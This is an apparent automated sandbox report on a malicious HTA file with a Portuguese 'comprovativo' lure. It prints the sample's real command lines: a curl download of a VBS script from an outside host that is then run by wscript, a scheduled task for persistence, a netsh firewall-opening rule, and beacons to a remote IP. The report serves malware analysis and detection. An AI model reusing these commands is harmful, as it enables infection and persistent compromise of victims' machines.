Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta

Overview

General Information

Sample name:#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta
renamed because original name is a hash value
Original sample name:VER_COMPROVATIVO_.hta
Analysis ID:1544420
MD5:57368b1f9ef19b72f8d342affe2efd77
SHA1:6bd0579bb92f64902f587f53670e2b263e611a9b
SHA256:390bb4f14a9be0faa0f5d0b4dc6fdfcca578b746a119e98d745650cff14976d9
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Modifies the windows firewall
Potential malicious VBS script found (has network functionality)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64_ra
  • mshta.exe (PID: 4432 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6076 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 5480 cmdline: curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • cmd.exe (PID: 2172 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 1948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • BLOCKBUSTER.exe (PID: 6372 cmdline: "C:\_6720c012c774c\BLOCKBUSTER.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16)
          • schtasks.exe (PID: 6436 cmdline: SCHTASKS /Query /TN "BLOCKBUSTER" MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6536 cmdline: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 6632 cmdline: SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00 MD5: 48C2FE20575769DE916F48EF0676A965)
          • cmd.exe (PID: 6556 cmdline: "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 6660 cmdline: netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720c012c774c\BLOCKBUSTER.exe" enable=yes profile=any MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 1588 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 3828 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • mshta.exe (PID: 2936 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 4524 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 2032 cmdline: curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • cmd.exe (PID: 4012 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 5496 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
    • cmd.exe (PID: 5140 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 372 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
SourceRuleDescriptionAuthorStrings
0000001C.00000000.1471984407.0000000000401000.00000020.00000001.01000000.00000010.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

    System Summary

    barindex
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, CommandLine: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\_6720c012c774c\BLOCKBUSTER.exe" , ParentImage: C:\_6720c012c774c\BLOCKBUSTER.exe, ParentProcessId: 6372, ParentProcessName: BLOCKBUSTER.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, ProcessId: 6536, ProcessName: cmd.exe
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, CommandLine: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\_6720c012c774c\BLOCKBUSTER.exe" , ParentImage: C:\_6720c012c774c\BLOCKBUSTER.exe, ParentProcessId: 6372, ParentProcessName: BLOCKBUSTER.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720c012c774c\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00, ProcessId: 6536, ProcessName: cmd.exe
    Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 4432, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\96LGQ1XY\6720c012c78c7[1].vbs
    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 109.234.39.156, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 1948, Protocol: tcp, SourceIp: 192.168.2.17, SourceIsIpv6: false, SourcePort: 49702
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2172, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" , ProcessId: 1948, ProcessName: wscript.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4432, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs, ProcessId: 6076, ProcessName: cmd.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2172, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" , ProcessId: 1948, ProcessName: wscript.exe
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 109.234.39.156, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 1948, Protocol: tcp, SourceIp: 192.168.2.17, SourceIsIpv6: false, SourcePort: 49702
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 4432, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720c012c78cd.vbs https://apps.downloadaps.com/pt/6720c012c774c/6720c012c78cd.vbs, ProcessId: 6076, ProcessName: cmd.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720c012c78cd.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2172, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720c012c78cd.vbs" , ProcessId: 1948, ProcessName: wscript.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results
    Source: unknownHTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49697 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49701 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49705 version: TLS 1.2

    Networking

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 109.234.39.156 80
    Source: C:\Windows\SysWOW64\curl.exeDropped file: adodbStream.Write xmlhttp.ResponseBodyJump to dropped file
    Source: C:\Windows\SysWOW64\curl.exeDropped file: adodbStream.SaveToFile destinationFolder & "\downloaded.zip", 2 Jump to dropped file
    Source: global trafficHTTP traffic detected: GET /mod-pt28/pt2810.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /pt/pt28.php?nomepc=user-PC HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: unknownTCP traffic detected without corresponding DNS query: 109.234.39.156
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 11:01:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 28 Oct 2024 13:03:12 GMTETag: "2656701-62589174e0400"Accept-Ranges: bytesContent-Length: 40199937Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 50 4b 03 04 14 00 00 00 08 00 2f 7c e6 3a d8 e1 df 30 3f 7d 01 00 00 b8 02 00 09 00 00 00 75 6e 72 61 72 2e 64 6c 6c ec fd 7d 7c 54 c5 f5 38 8e df 7d 48 b2 90 25 77 81 0d ac 12 21 ca aa c1 44 0c 6c b4 81 0d 18 20 84 a8 11 77 f3 b0 8b 02 09 b6 36 4d 53 b4 16 76 03 d6 08 89 37 1b 72 33 5c c4 16 a8 7d d7 5a db aa 6f ac be 5b 6c 35 80 62 dc 4d 20 09 f2 0c 56 50 ac e2 f3 0d 0b 08 3e 40 78 dc df 39 67 ee 6e 36 01 fb e9 f7 fb fa 7c 3e bf df 1f bf c0 de 87 b9 33 67 ce 9c 39 73 e6 cc cc 99 33 77 df b7 5a 30 08 82 60 84 5f 24 22 08 9b 04 fe 97 2f fc af ff 7a e1 97 32 e6 f5 14 e1 d5 41 bb ae dd a4 2b de 75 6d 59 f5 4f 17 a7 3f bc e8 e7 3f 59 74 ff 83 e9 3f ba ff a1 87 7e ee 4b ff e1 8f d3 17 f9 1f 4a ff e9 43 e9 05 f7 94 a6 3f f8 f3 07 7e 3c 7e c8 90 c1 76 0d c6 ba ef 7a 2c fb d7 ac 98 11 fd ed ec 34 cc f8 90 ee c3 66 ec 80 fb e1 63 c6 19 0a bd 1b 67 bc 03 f7 ef 4a 2e cc 38 4c 71 9b 66 cc a7 ef 86 19 4f d3 3d 75 c6 01 8a 37 9c ee 87 8f 8d a0 7b c9 4f 7f 54 8d 70 07 e2 ee 9a 29 08 c5 ba 04 21 f4 57 e7 9d d1 b0 23 82 fe da 64 dd 20 41 c8 d1 0b 42 3d 0f 33 bd a9 13 04 0b 26 d0 e3 ab 85 9e e1 31 41 4b 63 8c 26 5e 60 a0 97 0d 4b 0d f0 39 9f 27 b2 08 42 df 5d bb b5 e8 85 87 e1 eb 73 cb f5 82 0b df d3 0d 42 8e 51 b8 fc 2f db 20 34 0f 87 5b 89 5e 48 13 be ff ef e1 9f eb fb d7 15 e0 f9 8e ee fb e3 8f f7 fd 78 a9 0f ef 0e 3d 47 08 cb 3a 20 ff 74 28 cd f8 45 0f dc ef bb 1f e0 3b b5 b2 e7 c1 3d 57 1f 1f 0d f3 cd 1f cf a3 09 75 48 af d5 f0 dd 06 77 df 65 f1 82 e3 17 2d 5e f4 23 cc ce c8 cb 2c 24 c2 7d e5 15 e0 2d fa f1 c2 9f 43 c4 61 76 4e 03 e1 06 b8 ff ea b2 78 d3 85 ff ff df ff 96 3f 56 66 37 4e 0c d6 4f 2e f1 b0 53 fe 3b 5b ee d4 d5 9f 9d e9 b7 d5 ff 52 bf cc 3f ac fe 97 86 0a bf 79 83 ae b9 e9 d9 47 04 a1 a2 dd 28 d4 9f bd df 7f 3d 7c 5c e4 1f 03 1f af f5 5f 55 ff 4b e3 d5 fe e1 f5 bf 4c 48 f2 0f c9 9d 9e e8 37 f1 b8 1b 74 18 7b 27 fc b1 86 a7 e1 9d 3d f9 14 5c 6b 04 57 89 fa d2 f3 82 d0 b1 33 f6 87 f9 2b d3 b2 5b 4c 93 07 fb ed 8d db 7d c3 5a 8a 74 93 ef d4 f9 6d 52 50 2f b5 eb 1b b7 fb 3f 73 04 1d db 03 41 71 4d a8 25 04 40 47 05 a5 43 91 f8 80 9d fd fe 58 81 dd 08 45 d1 15 1a d9 6c 23 2b 34 39 bb 6b 1d 6c 6f e8 a8 de ab d4 e9 d3 9d 7b 6a f5 ec 2c 4b 51 8c b7 bb dc ea 75 ab 74 82 b4 d5 24 27 06 82 fe c1 9b 17 be a1 b7 a8 f3 6b 05 41 5e 66 aa 8c a2 bf b3 63 e7 e5 f0 01 67 93 dc b0 c0 0b 51 9f 7c 00 ae 9d 0d 4b e1 2a b4 9b 20 09 e4 cd 12 bd 8e 88 b3 cb 97 ec 52 27 2a 98 83 51 9e 0a 30 e5 65 c6 ca 8a 8e 2b e0 97 7d 19 7e 89 5e 97 1a 50 2e 43 2e e8 1f 80 1c d1 37 db 2c 08 81 a0 2f c9 a5 6e 5d a9 13 ee 1d 80 70 4d a4 fa c8 24 bd e5 81 3f 62 65 bb a4 63 e9 a5 e5 1e ef 1f 85 df e8 2d 8e ad 2e a5 c0 9e f3 c0 9f 89 0d 4e 75 36 ad 87 2a 12 d4 f0 33 82 d0 18 14 03 53 41 8
    Source: global trafficHTTP traffic detected: GET /mod-pt28/pt2810.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /pt/pt28.php?nomepc=user-PC HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 109.234.39.156Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: apps.downloadaps.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownHTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49697 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49701 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.155.19:443 -> 192.168.2.17:49705 version: TLS 1.2

    System Summary

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
    Source: classification engineClassification label: mal96.evad.winHTA@51/13@1/30
    Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GO30WR0E\6720c012c76dc[1].js
    Source: C:\_6720c012c774c\BLOCKBUSTER.exeMutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
